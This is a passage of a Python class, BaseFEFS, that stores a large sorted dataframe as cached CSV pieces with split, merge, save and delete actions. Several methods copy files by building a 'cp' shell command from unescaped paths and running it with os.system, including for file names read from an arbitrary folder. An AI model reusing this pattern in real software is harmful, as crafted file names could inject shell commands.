fefs.actions = dc(self.actions)\n fefs.action_params = dc(self.action_params)\n fefs.dfs = [ dc(df_) for df_ in self.dfs ]\n \n # # Cache section\n fefs.cache = dc(self.cache)\n \n \n # compensating codes for self.dfs[idx] is None\n for idx in range(len(fefs.pieces)):\n \n if self.dfs[idx] is None:\n \n assert fefs.dfs[idx] is None\n assert self.pieces[idx] == fefs.pieces[idx] \n \n piece = self.pieces[idx] \n src = self.__compose_piece_fullname(piece)\n dst = fefs.__compose_piece_fullname(piece)\n fefs_fullname = fefs.__compose_fullpath()\n if not os.path.isdir(fefs_fullname):\n os.mkdir(fefs_fullname)\n # print(\"Command:\", \"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n elif self.actions[idx] == \"\": # i.e., self.dfs[idx] is not None but no \"save\" command\n fefs.actions[idx] = \"save\"\n\n return fefs\n\n ############################################ Init methods: END ############################################\n ###########################################################################################################\n \n\n \n \n \n \n \n \n \n \n \n ##########################################################################################################\n ######################################### Path, Name, Piece: BEG #########################################\n @staticmethod\n def get_random_string(n):\n # choose from all lowercase letter\n letters = string.ascii_lowercase\n result_str = ''.join(random.choice(letters) for i in range(n))\n return result_str\n \n def gen_valid_piece(self, prefix=\"\", suffix=\"\"):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n while True:\n piece = self.__class__.get_random_string(self.piece_name_len)\n piece = prefix + piece + suffix\n if piece not in self.pieces:\n break\n return piece\n\n \n def __decompose_fullpath(self, fullpath):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n path = fullpath.split('/')\n name = path[-1]\n path = '/'.join(path[:-1])\n \n names = name.split('.')\n assert names[-1] == self.__class__.extension\n name = '.'.join(names[:-1])\n return (path,name)\n \n\n def __decompose_piece_fullname(self,piece_fullname):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n fullpath = piece_fullname.split('/')\n piece = fullpath[-1]\n fullpath = '/'.join(fullpath[:-1])\n path, name = self.__decompose_fullpath(fullpath)\n return (path,name,piece)\n\n\n def __compose_fullpath(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n fullpath = '/'.join([self.path, self.name + '.' 
+ self.__class__.extension])\n return fullpath\n \n\n def __compose_piece_fullname(self,piece):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n fullname = '/'.join([self.__compose_fullpath(), piece])\n return fullname\n\n \n def file_exists(self):\n fullpath = self.__compose_fullpath()\n return os.path.isdir(fullpath)\n \n ######################################### Path, Name, Piece: END #########################################\n ##########################################################################################################\n\n\n \n \n \n def vprint(self,*value):\n try:\n if self.verbose: # may not have the explicit self.verbose attribute\n print(value)\n except:\n pass\n \n \n \n def has_valid_status(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n attributes = [\n self.path, self.name, self.max_row_per_piece, self.row_cnt, \n self.seq_col,\n self.piece_name_len, self.fr, self.to, self.colnames, \n self.pieces, self.types,\n self.frs, self.tos, self.row_cnts, self.dfs, self.actions, self.action_params\n ]\n if any([ attr is None for attr in attributes ]):\n return False\n \n lists = [ self.pieces, self.types, self.frs, self.tos, self.row_cnts ]\n if any([ val is None for list_ in lists for val in list_ ]):\n return False\n return True\n \n \n \n @classmethod\n def get_index(cls,df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert cls != BaseFEFS\n \n \n if isinstance(df,pd.DataFrame):\n return list(df.index)\n elif isinstance(df,cls):\n fefs = df\n indices = list(range(fefs.row_cnt))\n return indices\n else:\n print(\"Type\", type(df), \"not supported\")\n assert False\n \n\n \n\n def __read_piece(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n piece = self.pieces[idx]\n type_ = self.types[idx]\n fullname = self.__compose_piece_fullname(piece)\n if type_ == \"csv\":\n\n if self.seq_read_dtype is None:\n df = pd.read_csv(fullname)\n else:\n df = pd.read_csv(fullname, dtype={self.seq_col:self.seq_read_dtype})\n\n # dtf = self.datetime_format\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df[self.seq_col] = df[self.seq_col].apply(lambda x: self.seq_trans_method(x)) \n\n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n \n self.dfs[idx] = df\n return self.dfs[idx]\n \n elif type_ == self.__class__.__name__:\n \n fefs = self.__class__()\n fullname += '.' 
+ self.__class__.extension\n fefs.read(fullname)\n self.dfs[idx] = fefs\n return self.dfs[idx]\n \n else:\n print(\"File type \\\"%s\\\" not yet implemented\"%str(type_))\n assert False\n \n \n \n def __write_piece(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n assert df is not None\n\n fefs_fullname = self.__compose_fullpath()\n if not os.path.isdir(fefs_fullname):\n os.mkdir(fefs_fullname)\n \n type_ = self.types[idx]\n piece = self.pieces[idx]\n fullname = self.__compose_piece_fullname(piece)\n \n if type_ == \"csv\":\n \n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n \n self.dfs[idx] = df\n # dtf = self.datetime_format\n df2 = dc(df)\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n df2[self.seq_col] = df2[self.seq_col].apply(lambda x: self.seq_inv_trans_method(x)) \n \n df2.to_csv(fullname, index=False)\n del df2; df2 = None\n \n elif type_ == self.__class__.__name__:\n \n fefs = df\n fefs.take_actions(max_level=4) #??? or max_level=3?\n fullname += '.' + self.__class__.extension\n fefs.write(fullname) # by calling write, this tsfefs object will have its path and name reset.\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n return\n\n\n\n\n\n\n\n \n \n\n ##################################################################################################################\n ################################################# Cache Ops: BEG #################################################\n \n \"\"\"\n Called by:\n - __getitem__using_idx\n - __getitem__using_indices\n - __setitem__using_idx\n - __setitem__using_indices\n - __delitem__using_idx\n - __delitem__using_indices\n \"\"\"\n def renew_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if idx in self.cache:\n self.cache.remove(idx)\n self.cache.append(idx)\n\n \"\"\"\n Called by:\n - __action_delete\n \"\"\"\n def remove_idx(self, idx): \n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if idx in self.cache:\n self.cache.remove(idx)\n self.cache = [ idx_ - 1 if idx_ > idx else idx_ for idx_ in self.cache ]\n\n \n\n \"\"\"\n Called by:\n - __action_split\n \"\"\"\n def split_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n - idx: the originally index, which will be retained, with new pieces created from it.\n - new_idx: split will lengthen the array, len(self.pieces)-1\n \n The new idx will be inserted in the cache behind the idx.\n \"\"\"\n new_idx = len(self.pieces)-1\n \n \n \"\"\"\n If idx not in cache, new_idx, which is split from idx, should not be in cache as well.\n \"\"\"\n if idx in self.cache:\n loc = self.cache.index(idx)\n if new_idx in self.cache:\n self.cache.remove(new_idx)\n self.cache.insert(loc,new_idx)\n else:\n if new_idx in self.cache:\n self.cache.remove(new_idx)\n # if idx not in cache, no need to have new_idx in cache.\n\n\n\n \"\"\"\n Called by:\n - __action_merge\n \"\"\"\n def merge_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n tobemerged_idx = 
self.action_params[idx]\n assert isinstance(tobemerged_idx,int)\n \n if tobemerged_idx in self.cache:\n loc2 = self.cache.index(tobemerged_idx)\n if idx in self.cache:\n loc1 = self.cache.index(idx)\n if loc2 > loc1:\n self.cache.remove(idx)\n self.cache.insert(loc2,idx)\n else:\n self.cache.insert(loc2,idx)\n \n \"\"\"\n Called by:\n - __add_fefs\n - __add_df\n \"\"\"\n def include_idx(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n only include idx to the lower priority.\n Note: 0 is the lowest priority.\n \"\"\"\n if idx not in self.cache:\n self.cache.insert(0,idx)\n\n\n\n def __set_piece_to_none(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n if df is None:\n return\n type_ = self.types[idx]\n if type_ == \"csv\":\n pass\n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n for idx2 in range(len(df.pieces)):\n df.__set_piece_to_none(idx2)\n else:\n assert False \n \n del df\n df = None\n self.dfs[idx] = None\n return\n\n\n def __count_opened_rows(self,idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.dfs[idx]\n type_ = self.types[idx]\n if df is None:\n return 0\n if type_ == \"csv\":\n return self.row_cnts[idx]\n elif type_ == self.__class__.__name__:\n # elif type_ == \"tsfefs\":\n fefs = df\n row_cnt = 0\n for idx_ in range(len(fefs.pieces)):\n row_cnt += fefs.__count_opened_rows(idx_)\n return row_cnt\n else:\n assert False\n \n\n def __maintain_cache_by_rows(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n cache_config = self.cache_config\n rows_in_cache = cache_config[\"rows_in_cache\"]\n \n cache = []\n for i in reversed(range(len(self.cache))):\n idx = self.cache[i]\n row_cnt = self.__count_opened_rows(idx)\n if rows_in_cache >= row_cnt:\n rows_in_cache -= row_cnt\n cache.append(idx)\n continue\n break\n \n cache = list(reversed(cache))\n clear_indices = set(self.cache) - set(cache)\n for idx in clear_indices:\n self.__set_piece_to_none(idx)\n self.cache = cache\n return\n \n\n\n \n def __maintain_cache_by_len(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n cache_config = self.cache_config\n len_of_cache = cache_config[\"len_of_cache\"]\n if len(self.cache) <= len_of_cache:\n return\n \n self.cache = self.cache[-len_of_cache:]\n for idx in range(len(self.pieces)):\n if idx in self.cache:\n continue\n self.__set_piece_to_none(idx)\n \n \n \n \n \n def maintain_cache(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # action_levels = [ BaseFEFS.action_domain.index(act) for act in self.actions ]\n # assert np.all(np.array(action_levels) == BaseFEFS.action_domain.index(\"\"))\n assert not self.has_pending_actions()\n \n\n self.__check_cache_config()\n cache_config = self.cache_config\n rows_in_cache = cache_config[\"rows_in_cache\"]\n len_of_cache = cache_config[\"len_of_cache\"]\n \n if rows_in_cache is not None:\n self.__maintain_cache_by_rows()\n elif len_of_cache is not None:\n 
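# length-based eviction: keep only the most recently used len_of_cache pieces open\n 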
self.__maintain_cache_by_len()\n else:\n assert False\n return\n\n ################################################# Cache Ops: END #################################################\n ##################################################################################################################\n \n \n \n \n\n\n #########################################################################################################\n ############################################## Action: BEG ##############################################\n \n def __action_nothing(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n return\n\n \n def __action_update(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n df = self.dfs[idx]\n assert df is not None\n \n type_ = self.types[idx]\n len_ = None\n if type_ == \"csv\":\n len_ = len(df)\n elif type_ == self.__class__.__name__:\n fefs = df\n len_ = fefs.row_cnt\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n fr, to = None, None\n if len_ > 0:\n if type_ == \"csv\":\n S_ = df[self.seq_col]\n elif type_ == self.__class__.__name__:\n S_ = df.__get_seqs()\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n fr, to = min(S_), max(S_)\n\n self.frs[idx], self.tos[idx] = fr, to\n self.row_cnts[idx] = len_\n frs = [ fr for fr in self.frs if fr is not None ]\n tos = [ to for to in self.tos if to is not None ]\n self.fr, self.to = min(frs), max(tos)\n row_cnts = [ rcnt for rcnt in self.row_cnts if rcnt is not None ]\n self.row_cnt = sum(row_cnts)\n self.actions[idx] = \"save\" # it will be saved later\n \n self.vprint(self.pieces[idx], \"turned to status \\\"save\\\"\")\n \n if len_ == 0:\n self.actions[idx] = \"delete\"\n \n self.vprint(self.pieces[idx], \"turned to status \\\"delete\\\" because its len is 0\")\n \n return\n \n\n def __action_save(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n self.__write_piece(idx)\n self.actions[idx] = \"\"\n return\n\n\n def __action_delete(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n\n df = self.dfs[idx]\n assert df is not None\n\n type_ = self.types[idx]\n piece = self.pieces[idx]\n fullname = self.__compose_piece_fullname(piece)\n if type_ == \"csv\":\n if os.path.isfile(fullname):\n os.remove(fullname)\n elif type_ == self.__class__.__name__:\n fefs = df\n fefs.remove()\n \n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n del self.pieces[idx]\n del self.types[idx]\n del self.frs[idx]; del self.tos[idx]\n del self.row_cnts[idx]\n del self.actions[idx]; del self.action_params[idx]\n del self.dfs[idx]\n del df; df = None\n \n self.remove_idx(idx)\n\n frs = [ fr for fr in self.frs if fr is not None ]\n tos = [ to for to in self.tos if to is not None ]\n if len(frs) > 0:\n assert len(tos) > 0\n self.fr, self.to = min(frs), max(tos)\n else:\n self.fr, self.to = None, None\n \n self.row_cnt = sum(self.row_cnts)\n return\n\n\n def __action_split(self, idx):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n\n df = self.dfs[idx]\n assert df is not None\n \n type_ = 
self.types[idx]\n        \n        \"\"\"\n        The design is not advanced enough to be able to split 1 TSFEFS into 2 TSFEFSs,\n        so let's have all the splits be csvs.\n        \"\"\"\n        if type_ == self.__class__.__name__:\n            df = df.export_dataframe()\n            df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n\n        n = len(df)\n        num_rows_per_file = int(self.max_row_per_piece/2)\n        num_of_files = int(np.ceil(n/num_rows_per_file))\n\n        dfs = [ df.iloc[(i*num_rows_per_file):((i+1)*num_rows_per_file)] for i in range(num_of_files) ]\n\n        if len(dfs) == 0:\n            assert False\n        elif len(dfs) == 1:\n            \"\"\"\n            no need for split action\n            \"\"\"\n            return\n        else:\n            self.types[idx] = \"csv\"\n            type_ = \"csv\"\n            self.dfs[idx] = df\n\n        \n        df = dfs[0]\n        self.dfs[idx] = df\n        \"\"\" fr and to updates can be left to the \"update\" action \"\"\"\n        self.actions[idx] = \"update\"\n\n        dfs = dfs[1:]\n\n        if type_ == \"csv\":\n            for df in dfs:\n                \"\"\"\n                instead of using \n                    self += df\n                the following code is preferred.\n                \n                Calling __add__ would include the new idx in the cache,\n                which would mess up the split_idx logic.\n                \"\"\"\n                piece = self.gen_valid_piece(prefix=\"\", suffix=\"\")\n                self.pieces += [piece]\n                self.types += [type_]\n                self.frs += [None] # leave to \"update\" action\n                self.tos += [None] # leave to \"update\" action\n                self.row_cnts += [None]\n                self.actions += [\"update\"]\n                self.action_params += [None]\n                self.dfs += [df]\n            \n            self.split_idx(idx) # this places the new indices next to idx's location in cache\n\n        else: # elif self.types[idx] == \"fefs\"\n            print(\"File type\", type_, \"not yet implemented\")\n            assert False\n        return\n\n\n    def __action_merge(self, idx):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n        \n        \n        df = self.dfs[idx]\n        \n        \"\"\"\n        There may have been a reason for asserting non-None here,\n        but it currently causes trouble; revisit why it was added.\n        \"\"\"\n        # assert df is not None\n        \"\"\"\n        Temporarily replace the above line by this\n        \"\"\"\n        if df is None:\n            df = self.__read_piece(idx)\n            self.dfs[idx] = df\n        \n        \n        idx_tobemerged = self.action_params[idx]\n        assert isinstance(idx_tobemerged,int)\n        df_tobemerged = self.dfs[idx_tobemerged]\n        \n        \n        \"\"\"\n        There may have been a reason for asserting non-None here,\n        but it currently causes trouble; revisit why it was added.\n        \"\"\"\n        # assert df_tobemerged is not None\n        \"\"\"\n        Temporarily replace the above line by this\n        \"\"\"\n        if df_tobemerged is None:\n            df_tobemerged = self.__read_piece(idx_tobemerged)\n            self.dfs[idx_tobemerged] = df_tobemerged\n\n        \n        type_ = self.types[idx]\n        type_tobemerged = self.types[idx_tobemerged]\n        if type_ == \"csv\" and type_tobemerged == \"csv\":\n            df = pd.concat([df,df_tobemerged]).reset_index(drop=True)\n        elif type_ == \"csv\" and type_tobemerged == self.__class__.__name__:\n            df_tobemerged = df_tobemerged.export_dataframe()\n            df = pd.concat([df,df_tobemerged]).reset_index(drop=True)\n        elif type_ == self.__class__.__name__ and type_tobemerged == \"csv\":\n            df += df_tobemerged\n        elif type_ == self.__class__.__name__ and type_tobemerged == self.__class__.__name__:\n            df += df_tobemerged        \n        else:\n            print(\"Type\", type_tobemerged, \"not supported.\")\n            assert False\n        \n        \n        self.merge_idx(idx) # has to be run before action_params[idx] is set to None\n        \n        \n        self.dfs[idx] = df\n        self.action_params[idx] = None\n        self.actions[idx] = \"update\"\n        \n        self.frs[idx_tobemerged] = None\n        self.tos[idx_tobemerged] = None\n        self.row_cnts[idx_tobemerged] = None\n        
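# the absorbed piece now carries placeholder metadata only; the \"delete\" action below removes its file\n        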
self.actions[idx_tobemerged] = \"delete\"\n self.action_params[idx_tobemerged] = None \n return\n\n\n def __sanity_check(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n n = len(self.pieces)\n listoflists = [ self.types, self.frs, self.tos, self.row_cnts, \n self.actions, self.action_params, self.dfs ]\n assert all([ n == len(l) for l in listoflists ])\n return\n \n \n def __map_action_to_func(self,level):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if level == 0:\n return self.__action_update\n elif level == 1:\n return self.__action_split\n elif level == 2:\n return self.__action_merge\n elif level == 3:\n return self.__action_save\n elif level == 4:\n return self.__action_delete\n elif level == 5:\n return self.__action_nothing\n else:\n print(\"No such action with level %i\"%level)\n assert False \n\n \n\n\n def take_actions(self, max_level=0):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n Never set max_level = 5, infinite loop.\n \"\"\"\n # Levels: 0) \"update\", 1) \"split\", 2) \"merge\", 3) \"save\", 4) \"delete\", 5) \"\".\n current_level = 0\n while current_level <= max_level:\n self.vprint(\"current_level:\", current_level)\n \n action_levels = [ self.__class__.action_domain.index(act) for act in self.actions ]\n \n action_indices = [ idx for idx in reversed(range(len(action_levels))) if action_levels[idx] == current_level ]\n if len(action_indices) == 0:\n current_level += 1\n else: # len(action_indices) > 0:\n for idx in action_indices:\n self.__map_action_to_func(current_level)(idx)\n current_level = 0\n return\n\n\n def has_pending_actions(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # b = any(np.array(action_levels) != BaseFEFS.action_domain.index(\"\"))\n action_levels = [ self.__class__.action_domain.index(act) for act in self.actions ]\n b = any(np.array(action_levels) != self.__class__.action_domain.index(\"\"))\n \n return b\n\n ############################################## Action: END ##############################################\n #########################################################################################################\n\n \n \n \n \n \n \n \n \n \n \n \n ################################################################################################################\n ############################################## Import,Export: BEG ##############################################\n\n\n def __no_overlapping_seq_range(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n ensure fr1 < to1 < fr2 < to2 < ...\n \"\"\"\n df = pd.DataFrame({\"fr\":self.frs,\"to\":self.tos})\n df = df.sort_values(by=[\"fr\",\"to\"])\n \n # print(\"##################\")\n # print(\"1.\")\n # print(\"df\")\n # print(df)\n # print(\"##################\")\n # print()\n \n orders = list(df.index)\n arr = np.array(df)\n \n # print(\"##################\")\n # print(\"2.\")\n # print(\"arr\")\n # print(arr)\n # print(\"##################\")\n # print()\n \n arr = arr.reshape(-1).tolist() # becomes [fr1,to1,fr2,to2,...]\n \n # print(\"##################\")\n # 
print(\"3.\")\n # print(\"arr\")\n # print(arr)\n # print(\"##################\")\n # print()\n \n # print(\"##################\")\n # print(\"4.\")\n # df2 = dc(df)\n # df2[\"fr\"] = df2[\"fr\"].apply(lambda x: str(x))\n # df2[\"to\"] = df2[\"to\"].apply(lambda x: str(x))\n # arr2 = np.array(df2)\n # arr2 = arr2.reshape(-1).tolist()\n # print(\"arr2\")\n # print(arr2)\n # print(\"##################\")\n # print()\n\n assert all([ arr[i+1] >= arr[i] for i in range(len(arr)-1) ])\n return orders\n \n\n \n \"\"\"\n Export all as a single df\n \"\"\"\n def export_dataframe(self):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n orders = self.__no_overlapping_seq_range()\n \n dfs = []\n \n # rearrange all the lists according to orders\n for idx in orders:\n \n df = self.dfs[idx]\n if df is None:\n df = self.__read_piece(idx)\n\n type_ = self.types[idx]\n if type_ == \"csv\":\n dfs.append(df)\n elif type_ == self.__class__.__name__:\n dfs.append(df.export_dataframe())\n else:\n print(\"Type\", type_, \"not supported\")\n assert False\n\n if len(dfs) == 0:\n return pd.DataFrame()\n \n df = pd.concat(dfs).reset_index(drop=True)\n return df\n\n \n \n def export_dstfile(self, dstfile):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df = self.export_dataframe()\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n df[self.seq_col] = df[self.seq_col].apply(lambda x: self.seq_inv_trans_method(x))\n df.to_csv(dstfile,index=False)\n return\n\n \n \n def export_dstfolder(self, dstfolder):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n Don't allow if any of those frs and tos are None,\n otherwise can't name the dst files.\n \"\"\"\n assert self.has_valid_status() # no None in the lists\n\n \"\"\"\n Don't allow if there is pending actions, \n otherwise can't copy from src to dst.\n \"\"\"\n assert not self.has_pending_actions()\n \n\n if not os.path.isdir(dstfolder):\n os.mkdir(dstfolder)\n \n \"\"\"\n The export format is e.g., \"3. 2020-01-10 03:05:11 ~ 2020-01-10 03:05:11.csv\"\n \"\"\"\n fullpath = self.__compose_fullpath()\n for idx in range(len(self.pieces)):\n \n piece = self.pieces[idx]\n fr, to = self.frs[idx], self.tos[idx]\n \n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n fr = self.seq_inv_trans_method(fr)\n to = self.seq_inv_trans_method(to)\n \n src = \"%s/%s\"%(fullpath,piece) \n \n f = \"%i. 
%s ~ %s.csv\"%(idx,fr,to)\n dst = \"%s/%s\"%(dstfolder,f)\n os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n \n # print(\"From %s to %s\"%(src,dst))\n \n return\n\n \n\n def import_dataframe(self, df):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n self.pieces = []\n self.types = []\n self.frs = []\n self.tos = []\n self.row_cnts = []\n \n self.actions = []\n self.action_params = []\n self.dfs = []\n \n self.cache = []\n \n df = df.sort_values(by=self.seq_col).reset_index(drop=True)\n self += df\n self.__action_split(0)\n return\n\n\n\n def import_srcfile(self, srcfile):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if self.seq_read_dtype is None:\n df = pd.read_csv(srcfile)\n else:\n df = pd.read_csv(srcfile, dtype={self.seq_col:self.seq_read_dtype})\n\n assert self.seq_col in df.columns\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df[self.seq_col] = df[self.seq_col].apply(lambda x: self.seq_trans_method(x))\n self.import_dataframe(df)\n return\n\n\n\n def import_srcfolder(self, srcfolder):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n \"\"\"\n List of files to be copied\n \"\"\"\n files = os.listdir(srcfolder)\n if srcfolder[-1] == '/':\n srcfolder = srcfolder[:-1]\n files = [ \"%s/%s\"%(srcfolder,f) for f in files ]\n files = [ f for f in files if not os.path.isdir(f) ]\n \n \n \"\"\"\n starts from nothing\n \"\"\"\n self.pieces = []\n self.types = []\n self.frs = []\n self.tos = []\n self.row_cnts = []\n\n self.actions = []\n self.action_params = []\n self.dfs = []\n \n self.cache = []\n\n \n fullpath = self.__compose_fullpath()\n if not os.path.isdir(fullpath):\n os.mkdir(fullpath)\n\n \n \"\"\"\n 1. copy files to fullpath\n 2. initialize the lists\n 3. 
do everything as if done in __action_update but not calling __action_update\n        \"\"\"\n        for idx,f in enumerate(files):\n            src = f\n            piece = self.gen_valid_piece(prefix=\"\", suffix=\"\")\n            dst = \"%s/%s\"%(fullpath,piece)\n            # print(\"Command:\", \"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n            os.system(\"cp \\\"%s\\\" \\\"%s\\\"\"%(src,dst))\n            \n            self.pieces += [piece]\n            self.types += [\"csv\"]\n            \n            # dfs[idx] has to exist before calling __get_seq(idx)\n            self.dfs += [None]\n            S = self.__get_seq(idx)\n            \n            self.frs += [min(S)]\n            self.tos += [max(S)]\n            self.row_cnts += [len(S)]\n\n            self.actions += [\"\"] # the above info is filled, to avoid calling __action_update\n            self.action_params += [None]\n        \n        self.fr = min(self.frs)\n        self.to = max(self.tos)\n        self.row_cnt = sum(self.row_cnts)\n        return\n\n\n    \n    def all_pieces_as_csv(self):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        dfs = []\n        for idx in range(len(self.pieces)):\n            type_ = self.types[idx]\n            if type_ == \"csv\":\n                continue\n            elif type_ == self.__class__.__name__:\n            # elif type_ == \"tsfefs\":\n                df = self.dfs[idx].export_dataframe()\n                dfs += [df]\n                self.actions[idx] = \"delete\"\n            else:\n                print(\"Type\", type_, \"not supported\")\n                assert False\n        self.take_actions(max_level=4)\n\n        for df in dfs:\n            self += df\n            self.actions[len(self.actions)-1] = \"split\"\n            self.take_actions(max_level=2)\n        return\n    ############################################## Import,Export: END ##############################################\n    ################################################################################################################\n\n    \n\n    \n\n    \n    ###################################################################################################################\n    ############################################# Overriding __len__: BEG #############################################\n    def __len__(self):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        return self.row_cnt\n    ############################################# Overriding __len__: END #############################################\n    ###################################################################################################################\n    \n    \n\n    \n    \n    \n    \n    ####################################################################################################################\n    ##################################### Overriding Square Bracket - general: BEG #####################################\n    def __idx_check(self,idx):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        assert isinstance(idx,int_types)\n        \n        while idx < 0:\n            idx += len(self)\n        \n        if idx > len(self) - 1:\n            print(\"Index out of range\")\n            assert False\n        \n        return idx\n\n\n\n    def __indices_check(self,indices):\n\n        \"\"\" \n        Base class should never be actually called,\n        have to be an implemented class.\n        \"\"\"\n        assert self.__class__ != BaseFEFS\n\n\n        \n        assert isinstance(indices,list)\n        assert all([ isinstance(idx,int_types) for idx in indices ])\n        assert len(indices) <= len(self)\n        \n        for i in range(len(indices)):\n            idx = indices[i]\n            while idx < 0:\n                idx += len(self)\n            indices[i] = idx\n        \n        if len(indices) > len(set(indices)):\n            print(\"Duplicated indices\")\n            assert False\n        \n        assert all([ idx < len(self) for idx in indices ])\n        return indices\n    \n    
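# Illustrative example (hypothetical sizes): for a store with len(self) == 10,\n    # __indices_check([-1, 3, 5]) normalizes to [9, 3, 5]; duplicated or\n    # out-of-range indices fail the checks above.\n    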
